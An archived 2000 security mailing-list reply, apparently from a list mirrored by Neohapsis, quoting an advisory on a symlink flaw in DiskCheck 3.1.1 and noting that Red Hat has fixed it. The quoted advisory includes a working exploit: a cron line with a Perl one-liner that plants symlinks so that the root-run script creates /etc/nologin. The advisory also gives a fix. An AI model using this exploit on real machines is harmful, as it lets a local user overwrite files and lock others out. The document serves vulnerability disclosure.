OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Diskcheck 3.1.1 Symlink Vulnerability
From: Stan Bubrouski (secnetCROSSWINDS.NET)
Date: Mon Aug 07 2000 - 10:41:49 CDT

At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
>Diskcheck 3.1.1 Symlink Vulnerability
>
>1 Introduction
>
>DiskCheck is a Perl script that monitors how much space is available
>on your hard drive. Basically, it checks your drive space every
>hour and takes action based on the specifications in the config file
>/etc/diskcheck.conf.
>
>DiskCheck 3.1.1 is available from
>http://www.kaybee.org/~kirk/html/linux.html and
>RedHat Powertools 6.x.
>
>2 Vulnerability
>
>The command, /etc/cron.hourly/diskcheck.pl is executed with root
>privilege
>every hour. It creates a temporary file, whose default name is
>/tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
>is predictable and is willing to follow symbolic links. This may allow
>malicious local users to create or overwrite arbitrarily named files.
>3 Exploit
>
>The following cron job creates the file, /etc/nologin.
>
>0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
> symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
>
>4 Solution
>
>Relocate the temporary file into the directory where root only can
>create
>a file.
>
>Example)
>
>Edit /etc/diskcheck.conf
>
> $tempfile = '/var/local/diskusagealert.txt'
>
># ls -ld /var/local
>drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/
>
>
>You, Jin-Ho, jhyouchonnam.ac.kr

This was reported on the list about a month ago and is fixed in Red Hat's
current rawhide,
and in Red Hat Pinstripe (7.0 beta). I don't know of any other distros
that include it.

-Stan Bubrouski